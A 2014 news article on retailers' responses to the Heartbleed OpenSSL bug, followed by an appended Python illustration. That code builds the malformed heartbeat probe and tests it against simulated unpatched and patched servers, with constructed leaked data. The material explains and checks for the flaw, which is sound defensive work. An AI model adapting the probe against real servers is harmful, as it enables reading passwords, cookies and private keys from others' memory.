Retailers scramble to plug Heartbleed
April 11, 2014 06:26 PM
Netflix Inc. wasted no time this week when word of the Heartbleed software bug spread like a hot video gone viral.
"Like many companies, we took immediate action to assess the vulnerability and address it,” a Netflix spokesman says. The quick action, he adds, appeared to have prevented any harm to company data. “We are not aware of any customer impact.” Netflix is No. 9 in the Internet Retailer’s Top 500 Guide.
Netflix, which operates its web site on an e-commerce platform developed in-house, didn't comment further on the steps it took to guard against Heartbleed. That's the name of a flaw recently discovered in OpenSSL, the open-source encryption software that many companies use to protect the data on their web sites and Internet-connected computer networks. OpenSSL implements SSL (secure sockets layer) and its successor TLS, the encryption protocols that protect data such as account numbers and payment information while it travels over the Internet; the software is also built into Internet routers and other networking equipment. Heartbleed does not break the encryption itself. Rather, the bug lets anyone who connects to an affected server read pieces of the server's memory, which can contain passwords, session cookies and even the private key behind the site's SSL certificate.
It also is widely used to protect a wide range of web connections and applications, including e-mail systems and Internet connections to the technology of a company’s outside vendors, such as hosted payroll management software.
The "Open" in OpenSSL, however, refers to an open-source implementation of SSL, and it is this implementation that the Heartbleed bug affects, experts say. Proprietary SSL technology provided by companies like Symantec Inc., Thawte and others was not impacted, says Steve Krebsbach, vice president of technology at Volusion Inc., a provider of an e-commerce technology platform.
Heartbleed’s biggest impact was on Internet-based data storage and other applications from companies including Google Inc., Amazon.com Inc.’s Amazon Web Services and web-hosting firm Rackspace Inc. With these systems largely built on open-source technology, they tend to include a lot of OpenSSL encryption technology, Krebsbach says.
One online retailer said privately that it worked quickly with Amazon Web Services this week to ensure that its software was patched and passwords changed to prevent any possible intrusions into its web infrastructure.
Google, Amazon and Rackspace each issued statements this week describing how they had patched their systems, and were continuing to do so, to prevent security breaches.
Cisco Systems Inc. and Juniper Networks—two major providers of Internet routers and other gear—also said that many of their products were affected by the Heartbleed bug and that they were taking steps to fix it.
Meantime, other online merchants and technology firms said they were taking several precautionary steps to ensure their web sites and other digital applications were protected. Among other things, they checked with e-commerce platform providers, web hosting services, and any other vendors for which they maintain Internet connections.
“We verified with our I.T. provider that all was well with our in-house network,” says Derek Gaskins, president of Aleva Stores, No. 486 in the Internet Retailer’s Top 500 Guide. “None of our equipment was utilizing OpenSSL.” But, taking no chances, he adds that his lead software developer was still “going through everything with a fine-tooth comb to be sure. But we appear to have dodged this bullet.”
Richard Sexton, president of online furniture retailer Carolina Rustica, which operates on the Magento e-commerce platform, says he was able to work with Rackspace, his hosting service, to ensure his site wasn't vulnerable. Carolina Rustica is part of Mattress USA Inc., No. 348 in the Top 500.
At Volusion, Krebsbach says the company's e-commerce platform was never directly threatened by the Heartbleed bug because Volusion doesn't use OpenSSL encryption. Nonetheless, he says Volusion quickly contacted some 20 or so companies that supply it with Internet hardware, such as routers or switches, to ensure they didn't have OpenSSL technology that hadn't been updated.
Shopify Inc., which provides e-commerce technology hosted on the Internet, also said that its client online stores were secured against the Heartbleed vulnerability. Nonetheless, “we do advise all our merchants to do an audit of all the other companies they use for e-mail hosting, banking, payroll, etc.,” vice president of growth Craig Miller says. “It’s also a very good practice to change passwords on a regular basis.”
Forrester Research Inc., which estimates that at least half of all external-facing web sites use OpenSSL in some fashion, issued a report on Heartbleed Friday, "Quick Take: Stem the Heartbleed: How to fix a broken OpenSSL implementation and what to do while everyone else fixes theirs," that includes the following steps e-commerce companies should take:
● Upgrade all software applications that use OpenSSL to versions that incorporate the fix issued by the OpenSSL Project, the volunteer organization of software engineers behind OpenSSL;
● Contact all of a web property’s hardware as well as software vendors to confirm they’ve upgraded their own systems;
● Schedule a company-wide password change for software systems as quickly as possible;
● Proactively tell employees as well as customers what steps your company is taking to deal with Heartbleed.
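As an added, self-contained illustration of what the first step above actually has to verify (this is example code written for this page, not code from the article, from Forrester or from the OpenSSL Project), the following Python models the check that many teams ran that week. The TLS heartbeat extension (RFC 6520) lets one side send a small payload that the other side echoes back. In OpenSSL 1.0.1 through 1.0.1f (the flaw is tracked as CVE-2014-0160 and was fixed in 1.0.1g, released April 7, 2014) the server trusted the 16-bit payload length written inside the message rather than the length of the record that carried it, so a three-byte request claiming 16 KB of payload got back 16 KB of whatever happened to follow the request in the server's memory. The two "server" functions here are simulations of the unpatched and the patched behaviour, and the heap contents are constructed sample data; against a live host you would first complete a TLS handshake over a socket and then send the same probe, which this offline example omits.

```python
import struct

# TLS record content types (RFC 5246 / RFC 6520)
CONTENT_ALERT = 0x15
CONTENT_HEARTBEAT = 0x18
TLS_1_1 = b"\x03\x02"
HB_REQUEST, HB_RESPONSE = 0x01, 0x02


def tls_record(content_type: int, version: bytes, body: bytes) -> bytes:
    """Wrap body in a TLS record header: type (1), version (2), length (2)."""
    return bytes([content_type]) + version + struct.pack("!H", len(body)) + body


def parse_records(data: bytes):
    """Split a TLS byte stream into (content_type, version, body) tuples,
    stopping at the first truncated record."""
    records, i = [], 0
    while i + 5 <= len(data):
        ctype, version = data[i], data[i + 1:i + 3]
        length = struct.unpack("!H", data[i + 3:i + 5])[0]
        body = data[i + 5:i + 5 + length]
        if len(body) < length:
            break
        records.append((ctype, version, body))
        i += 5 + length
    return records


def build_heartbeat_request(claimed_len: int, payload: bytes, padding: bytes = b"") -> bytes:
    """HeartbeatMessage: type (1), payload_length (2), payload, padding.
    A well-formed request has claimed_len == len(payload) and at least 16 bytes
    of padding; the Heartbleed probe claims far more payload than it carries."""
    body = bytes([HB_REQUEST]) + struct.pack("!H", claimed_len) + payload + padding
    return tls_record(CONTENT_HEARTBEAT, TLS_1_1, body)


def simulate_vulnerable_server(request: bytes, heap_after: bytes) -> bytes:
    """Model of the unpatched handler (OpenSSL 1.0.1 to 1.0.1f): take payload_length
    from the message and copy that many bytes starting at the request payload,
    running off the end of the request into adjacent memory.
    heap_after is a constructed stand-in for that adjacent memory."""
    (_, version, body), = parse_records(request)
    claimed = struct.unpack("!H", body[1:3])[0]
    repeats = claimed // max(1, len(heap_after)) + 1      # make the "heap" long enough
    memory = body[3:] + heap_after * repeats               # payload, then whatever follows it
    echoed = memory[:claimed]                              # the over-read
    resp = bytes([HB_RESPONSE]) + struct.pack("!H", claimed) + echoed + b"\x00" * 16
    return tls_record(CONTENT_HEARTBEAT, version, resp)


def simulate_patched_server(request: bytes) -> bytes:
    """Model of the 1.0.1g handler: silently discard a heartbeat whose claimed
    payload plus 16 bytes of padding cannot fit in the record that carried it
    (RFC 6520 section 4); otherwise echo only the bytes that were actually sent."""
    (_, version, body), = parse_records(request)
    claimed = struct.unpack("!H", body[1:3])[0]
    if 1 + 2 + claimed + 16 > len(body):
        return b""                                         # dropped, no reply at all
    resp = bytes([HB_RESPONSE]) + struct.pack("!H", claimed) + body[3:3 + claimed] + b"\x00" * 16
    return tls_record(CONTENT_HEARTBEAT, version, resp)


def assess_response(response: bytes, sent_payload: bytes):
    """Classify what came back from a heartbeat probe. Returns (verdict, leaked) with
    verdict one of: 'vulnerable' (reply carried more payload than we sent),
    'echo_only' (reply echoed exactly our payload), or 'no_heartbeat_reply'
    (alert or silence: the request was dropped, or heartbeat is unsupported)."""
    for ctype, _, body in parse_records(response):
        if ctype == CONTENT_ALERT:
            return "no_heartbeat_reply", b""
        if ctype == CONTENT_HEARTBEAT and body and body[0] == HB_RESPONSE:
            length = struct.unpack("!H", body[1:3])[0]
            payload = body[3:3 + length]
            if len(payload) > len(sent_payload):
                return "vulnerable", payload[len(sent_payload):]
            return "echo_only", b""
    return "no_heartbeat_reply", b""


# Constructed sample of what might sit next to the request buffer on a busy web
# server: another customer's in-flight request, session cookie included.
CONSTRUCTED_HEAP = (b"POST /checkout HTTP/1.1\r\n"
                    b"Cookie: SESSION=constructed-sample-token\r\n"
                    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                    b"card=4111111111111111&exp=0119&cvv=000\r\n")


def run_demo():
    """Send the classic probe (claims 16 KiB of payload, carries none) to both models."""
    probe = build_heartbeat_request(0x4000, b"")
    vuln_verdict, leaked = assess_response(simulate_vulnerable_server(probe, CONSTRUCTED_HEAP), b"")
    fixed_verdict, _ = assess_response(simulate_patched_server(probe), b"")
    return vuln_verdict, leaked, fixed_verdict


if __name__ == "__main__":
    verdict, leaked, fixed = run_demo()
    print("unpatched model:", verdict, "leaked", len(leaked), "bytes, e.g.", leaked[:70])
    print("patched model:  ", fixed)
```

Two caveats the list above leaves implicit. First, the version banner printed by `openssl version` is not a reliable sign of exposure: distributions such as Debian and Red Hat shipped the fix as a patch to their existing 1.0.1e packages without changing the upstream version number, and a server process that was started before the library was updated keeps the old code in memory until it is restarted, so test the behaviour or read the package changelog rather than the banner. Second, the password change in the third step only helps once the server is patched and its SSL certificate has been reissued and the old one revoked; a private key read out of memory before the patch lets an attacker impersonate the site or decrypt sessions negotiated with it, so passwords reset before that point can be captured again.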